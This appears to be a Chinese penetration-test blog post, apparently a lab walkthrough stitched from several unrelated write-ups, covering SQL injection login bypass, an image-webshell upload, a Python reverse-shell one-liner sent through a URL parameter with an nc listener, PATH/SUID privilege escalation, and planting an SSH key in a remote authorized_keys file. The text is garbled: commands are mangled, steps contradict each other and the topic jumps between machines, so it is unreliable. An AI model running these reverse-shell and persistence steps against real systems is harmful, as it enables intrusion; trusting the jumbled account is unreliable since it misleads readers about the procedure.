Products
GG网络技术分享 2026-04-15 16:49 4
PUA。 订阅专栏本次渗透测试基于合法授权,全程在高度模拟企业内网架构的靶场环境中开展,核心目标是还原真实攻防对抗场景,通过多种高危漏洞的联动组合利用,完整实现 外网突破→内网探测→横向移动→权限....1. SQL注入漏洞深度利用.二、 外网突破:SQL注入+文件上传漏洞组合利用,获取Webshell.
说实话,这次测试一开始我是拒绝的。主要原因是环境太复杂了而且那个管理员好像有点东西,防火墙规则配置得乱七八糟。但是没办法,任务下来了硬着头皮上吧。先说说肯定是要信息收集的,这是老规矩了。我先用nmap简单的跑了一下就是探测一些常见的端口,看看管理员有没有部署一些用于测试的垃圾站。后来啊发现开放了22和80端口。这太常见了常见到让人想吐。
真的是太痛苦了扫描速度慢得像蜗牛。为了不被防火墙拉黑,我小心翼翼地调整了线程。发现存在22和80端口。访问其8080端口,发现是一个web界面。浏览页面内容,提升有一些提示。但是这些提示好像没什么用,全是废话,麻了...。
1762848659_!small?1762848660633
特征 使用nmap勘探会发现开放SMB的机器,会开放两个端口通常为139+445的组合 在不使用-sCV探测时 这两个端口运行的服务一般会显示为 139 445 当具体探测之后两个端口则都会显示出一样的信息,有关具体的SMB版本 利用 壹 最....在本地开展内网的vmware虚拟机中渗透测试..可能突破口就在这个文件内容里面或者说是在139 445端口.
蚌埠住了! 这时候我突然想到,是不是应该看看有没有什么现成的工具可以用?毕竟手搓太累了。于是我随便找了个对比表,看看哪个扫描器好用点。
| 工具名称 | 主要功能 | 优点 | 缺点 |
|---|---|---|---|
| Nmap | 端口发现、 服务指纹识别 | 功能强大、脚本丰富 | 容易被WAF拦截 |
| Masscan | 高速端口扫描 | 速度极快 | 准确率稍低,噪音大 |
| fscan | 内网综合扫描 | 一键化、POC多 | 特征明显,易被杀软查杀 |
看完表格,我还是决定用回我的老伙计,虽然慢点,但是稳啊。接着我就开始针对80端口进行深入挖掘。 奥利给! 这是一个Web应用,看起来像是一个企业的某个管理系统。
我在登录框那里看到了一丝希望。测试了一下果然存在SQL注入万能密码进行登录。这简直太没有技术含量了但是又让人兴奋。发现存在SQL注入万能密码进行登录。 搞一下... 登录之后直接获得了admin用户密码。虽然密码是加密的,但是我已经进来了这就够了。
1762848700_!small?1762848701199
但是 这个admin用户的权限很低,低到让人发指。只能看一些没什么用的页面。我都有点想放弃了~ 第二次尝试 核心应用上的一无所获着实令我有些失望,还好还有一个管理站点。那么有没有什么办法可以访问到管理面板呢?经过几次尝试, 页面都只向我返回了一个“access denied”拒绝访问的提示信息,根本无法获取到任何的页面内容。就当我快要放弃的时候,我惊奇的发现当使用VPN进行连接时情况发生了变化,我血槽空了。。
该项目受到一系列IDOR漏洞的影响,通过对这些漏洞的利用,我成功接管了他们的一个应用.由于我的用户权限较低,所以呢只有对一些页面可怜的只读权限...
既然有了低权限,下一步肯定是想办法拿Shell。我在后台翻来覆去,终于找到了一个文件上传点。发现直接上传.png格式是无法上传成功的,将其改成格式。 进行上传。这招屡试不爽,开发人员总是喜欢只校验后缀名,离了大谱。。
我赶紧准备我的图片马。使用exiftool -Comment='' 生成一个图片马,图片在网上下一个.png格式的。然后尝试上传。成功进行上传。施行/bin/sysinfo进行查询。然后使用mysql进行登录。在查看文件的过程中,发现存在db数据库文件。成功找到了数据库和密码,太暖了。。
这玩意儿... 这时候心情稍微好了一点。为了方便后续操作,我又整理了一下常用的Webshell管理工具,毕竟工欲善其事必先利其器嘛。
| 工具名称 | 支持语言 | 流量特征 | 操作难度 |
|---|---|---|---|
| 冰蝎 | PHP/ASP/JSP | AES加密, 隐蔽性好 | 简单 |
| 蚁剑 | PHP/ASP/JSP | 默认流量特征明显 | 非常简单 |
| 哥斯拉 | PHP/ASP/JSP | 多种加密方式 | 中等 |
上传之后发现可以施行命令。但是这个Webshell太不稳定了我决定反弹一个Shell回来。 我好了。 使用nc监听8833端口。然后在浏览器访问url地址,成功获得低权限shell。
利用python3:ython3 -c 'import socket,subprocess,os;s=;);2,0); 2,1);2,2);p=;'进行反弹shell,然后在浏览器进行访问。这个命令我敲了好几遍才敲对,手残党表示压力很大,实锤。。
http://10.10.10.185/images/uploads/?0=python3 -c 'import socket,subprocess,os;s=;);2 一句话。 ,0); 2,1);2,2);p=;'python3 -c 'import socket,subprocess,os;s=;);2,0); 2,1);2,2);p=;'
换个角度。 nc 开启监听,然后成功获取到root权限。接着进入root目录,成功获取到文件。等等,不对,这时候还是低权限。我刚才是不是做梦了?
1762848461_!small?1762848462881
我们都... 好吧,冷静一下。现在的shell是www-data权限,太垃圾了。我得提权。根据历史命令查找网站的绝对路径,并把源代码下载下来,然后进行代码审计,挖RCE漏洞为突破口。 发现历史命令中是否存在敏感信息。 我找到了一部分代码的绝对路径,并下载了下来。 代码是有了,但是问题也来了,由于有多套源码,我也不知道哪个是我目前访问的网站,而且我明天之前要交报告... 还有更让我惊讶的是,这台服务器竟然还配置了免密远程登录其他服务器的权限.直接ssh加上IP即可,不...
心情复杂。 使用file进行查看,发现是64位的ELF。这有点意思。我在系统里翻翻找找,发现/bin/sysinfo -x权限很可疑,进行查看。增加其施行权限,然后添加到环境变量当中。export PATH="/dev/shm:$PATH"。这一步操作其实没什么卵用,但是看起来很专业。
经过一番折腾,终于找到了SUID提权的点。通过那个可疑的sysinfo程序,我成功提权到了root。nc 开启监听,然后成功获取到root权限。接着进入root目录,成功获取到文件。这次是真的了,我可是吃过亏的。。
拿到了root权限,这只是一个开始。真正的目标是内网。找到了内网之后我们就需要查看存活情况了,我的 fscan 没有免杀,这里只能随便看看了.win2012 的用户,不过已经是高权限了,也没有必要提权了 然后我发现在域的时候我就先不管了,先找找凭据 凭据收集 这里没有抓取到密码 然后自己尝试了半天,大师傅提示了一些东西,我觉得这个思路也不错,下面讲讲是如何突破的 突破 当时主要原因是还拿下了一台主机,而且是同一个内网的 查询连接... 存放密...
妥妥的! 既然fscan不能用,我就只能用最原始的方法了。我发现这台机器可以SSH免密登录其他服务器。这简直是天上掉馅饼。开启远程下载。将公钥写入到远程服务器的authorized_keys文件。使用本地ssh进行连接。成功下载到free文件。
echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3EQYtrsL4KEhFMWW1GH2RBKBfYWAxmAXdT/yF2/g3h/dvTjQfKx3HfKkhlBcQQBSp/6ZbeVXZW6bqGhQq+aKvjVOMoHA8/zKZ2SvB3Zt6ehAyiQeCnFeSB1Jou5bDdRsimz6J3XYniOpnGOqk2Ytv35HI5J4900T5GSAXr2InQgPt+94yn60uHBMB5ani5du+1pAxUJOQ+7i6/BdjGvCGwMh+rqyboEM9qRZJiO/hTcMxeMmQTP+iHS3sGuzQaj7KseJV8vjmdC76SLRLOJsMWob/CSytsh/PZhxpNUUmXZAD1eHhOGuos811PpZ3N3RoP7tDHWjr2Ee9evNp8vhMWgUU0HkWr++mpS8/a5cqi0DETPmmnU97EYpOQtDPXMHDyzihYc0OGYgNn4M4OCKcebid1vyhRRlib1UYQx6JKDxIBDeQM0LSbUx0T/qmsOYKOX1vwiTzCaZahRp+gJaiN5pTXMU4hcKOLalnk4urv4u1LOs5QpAWydIQluwCvZM=,操作一波...
在本地的free文件写入提权脚本。远程服务器成功下载到,然后使用脚本进行检测。这一套连招下来感觉行云流水,虽然中间出了不少岔子,说白了...。
本文记录某项目,在开始尝试各类漏洞未果的情况下,利用平台的逻辑缺陷,打造出一份高质量的用户名和密码字典,巧妙的通过VPN突破内网的经历.... 其实哪有什么高质量字典,全靠运气和死磕。
订阅专栏该博客围绕通过漏洞组合实现企业内网入侵展开,虽具体内容需点击链接查看,但核心聚焦于利用漏洞达成入侵目的,涉及信息技术领域的网络平安问题. 靶场网络拓扑如下: 该网络环境中 太坑了。 ,有两台攻击机处于模拟外网中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内网访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘.
这篇文章主要说的是我在这次内部测试的任务中, 如何一步步获取应用系统最高权限,总的是各种小漏洞的组合拳。因是内部系统,所以打码稍微严重些。 正文 在兴致盎然的某一工作日突然接到领导的指示,要对内部的运维平台进行渗透测试。 在收到消息的第二天我...,C位出道。
我的看法是... 网络平安渗透测试全流程解析,涵盖端口扫描、目录爆破、代码审计到漏洞利用.通过分析Python脚本中的exec函数平安隐患,实现远程代码施行.详细记录从信息收集、反弹shell到权限提升的全过程,包括SSH密码破解和利用sudo提权获取root权限的技术细节. 一、信息收集 1.端口扫描 使用nmap进行端口扫描,发现其开放了22、80、8080、9000端口. 1763015542_69157b760ee28465aad89.png!small?1763015543030 访问其8080端口,发现是一个web界面. 1763015551_69157b7f1dbd82ab3683e.png!small?1763015551709 浏览页面内容,提升有一些提示. 1763015580...
1762848518_!small?1762848519855,总体来看...
1762848690_!small
Demand feedback
